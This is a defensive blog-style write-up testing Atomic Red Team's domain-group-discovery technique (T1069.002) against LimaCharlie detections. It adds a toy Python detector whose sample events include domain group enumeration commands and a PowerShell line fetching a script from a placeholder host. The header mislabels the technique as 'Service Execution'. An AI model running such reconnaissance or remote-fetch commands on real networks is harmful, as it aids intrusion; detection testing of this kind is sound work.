CYBERSECURITY JOB HUNTING GUIDE
T1069.002 Service Execution
Author: Stefan Waldvogel
LimaCharlie vs. Service Execution
Overview:
Description from ATT&CK
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.
source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1069.002 -ShowDetailsBrief
Invoke-AtomicTest T1069.002 -CheckPrereqs
Invoke-AtomicTest T1069.002 -GetPrereqs
Invoke-AtomicTest T1069.002
Invoke-AtomicTest T1069.002 -Cleanup
This test contains 8 sub-tests.
Changes:
-none-
Limitations:
-I am not actively logging LDAP or AD-
Creating a GPO on the server and enabling better logging could help.
Result:
Invoke-AtomicTest T1069.002 -TestNumbers 1, sigma, Net.exe Execution
Invoke-AtomicTest T1069.002 -TestNumbers 2, sigma detected the powershell
Invoke-AtomicTest T1069.002 -TestNumbers 3, sigma, Net.exe Execution
Invoke-AtomicTest T1069.002 -TestNumbers 4, sigma, soteria 00269-WIN-Powershell_With_URL_In_Commandline
Invoke-AtomicTest T1069.002 -TestNumbers 5, sigma, soteria 00048-WIN-Powershell_Invoke-WebRequest_Usage, LDAP access not detected, logging on the server?
Invoke-AtomicTest T1069.002 -TestNumbers 6, sigma, soteria, detected, but not the LDAP request itself
Invoke-AtomicTest T1069.002 -TestNumbers 7, sigma detected the powershell
Invoke-AtomicTest T1069.002 -TestNumbers 8, sigma AdFind Usage Detection
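The results above say which detections fired for each sub-test, but not what those rules actually look at. As an added example (not code from the original post, from LimaCharlie, or from Atomic Red Team), the script below runs a small set of process-creation rules, modeled on the rule names listed in the results, over constructed sample events. The event layout, the rule logic and the sample command lines are assumptions of this example, not LimaCharlie's schema or the real Sigma/Soteria rule bodies. The last two events show the gap the author hit in tests 5 and 6: a script whose LDAP query happens in-process leaves nothing for command-line rules to match, so seeing the query itself needs LDAP/AD logging on the domain controller.

```python
"""Toy process-creation detector for T1069.002 (domain group discovery).

Constructed example: rule names mirror those cited in the test results, but
the matching logic and the event shape are assumptions of this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (constructed shape, not LimaCharlie's)."""
    image: str          # path of the newly created process
    command_line: str   # its full command line
    parent_image: str   # path of the parent process


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


def rule_net_group_domain(ev: ProcessEvent) -> bool:
    """net.exe / net1.exe listing groups scoped to the domain (tests 1 and 3)."""
    return (_basename(ev.image) in ("net.exe", "net1.exe")
            and _has(r"\bgroup\b", ev.command_line)
            and _has(r"/do(main)?\b", ev.command_line))   # net accepts /do as well


def rule_adfind(ev: ProcessEvent) -> bool:
    """AdFind binary, or an AdFind-style command line if the binary was renamed (test 8)."""
    return (_basename(ev.image) == "adfind.exe"
            or _has(r"\badfind(\.exe)?\b", ev.command_line))


def _is_powershell(ev: ProcessEvent) -> bool:
    return _basename(ev.image) in ("powershell.exe", "pwsh.exe")


def rule_powershell_url(ev: ProcessEvent) -> bool:
    """PowerShell launched with a URL on its command line (test 4)."""
    return _is_powershell(ev) and _has(r"https?://", ev.command_line)


def rule_powershell_webrequest(ev: ProcessEvent) -> bool:
    """PowerShell download cmdlet or one of its aliases on the command line (test 5)."""
    return _is_powershell(ev) and _has(
        r"\b(Invoke-WebRequest|iwr|curl|wget)\b", ev.command_line)


# Rule names follow the detections named in the results; bodies are this example's.
RULES = {
    "Net.exe Execution": rule_net_group_domain,
    "AdFind Usage Detection": rule_adfind,
    "Powershell_With_URL_In_Commandline": rule_powershell_url,
    "Powershell_Invoke-WebRequest_Usage": rule_powershell_webrequest,
}


def detect(ev: ProcessEvent) -> list:
    """Names of every rule that fires on one event, in RULES order."""
    return [name for name, fn in RULES.items() if fn(ev)]


# Constructed sample events; paths and script names are placeholders.
SAMPLE_EVENTS = (
    ProcessEvent(r"C:\Windows\System32\net.exe",
                 'net group "Domain Admins" /domain', r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\net1.exe",
                 "net1 group /domain", r"C:\Windows\System32\net.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "Invoke-WebRequest -Uri https://example.invalid/Get-Groups.ps1 -OutFile Get-Groups.ps1"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Tools\AdFind.exe",
                 'AdFind.exe -f "(objectcategory=group)"', r"C:\Windows\System32\cmd.exe"),
    # The LDAP query lives inside the script and goes straight to the DC: nothing on
    # this command line names a known tool, so no process-based rule fires. Only
    # LDAP/AD logging on the domain controller would show the query itself.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -File C:\Users\alice\Documents\list-groups.ps1",
                 r"C:\Windows\explorer.exe"),
    # Benign: local account listing, not domain-scoped, should stay quiet.
    ProcessEvent(r"C:\Windows\System32\net.exe", "net user", r"C:\Windows\System32\cmd.exe"),
)


def run_detections(events=SAMPLE_EVENTS) -> dict:
    """Map each event's command line to the rule names that fired on it."""
    return {ev.command_line: detect(ev) for ev in events}


if __name__ == "__main__":
    for cmd, hits in run_detections().items():
        print(f"{hits or ['-- no detection --']}  <=  {cmd}")
```

Run the script directly to see which rule names each constructed command line trips; the two trailing events come back with no detection, which is the same outcome the results list records for the LDAP request in tests 5 and 6.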
© 2021. This work is licensed under a CC BY-SA 4.0 license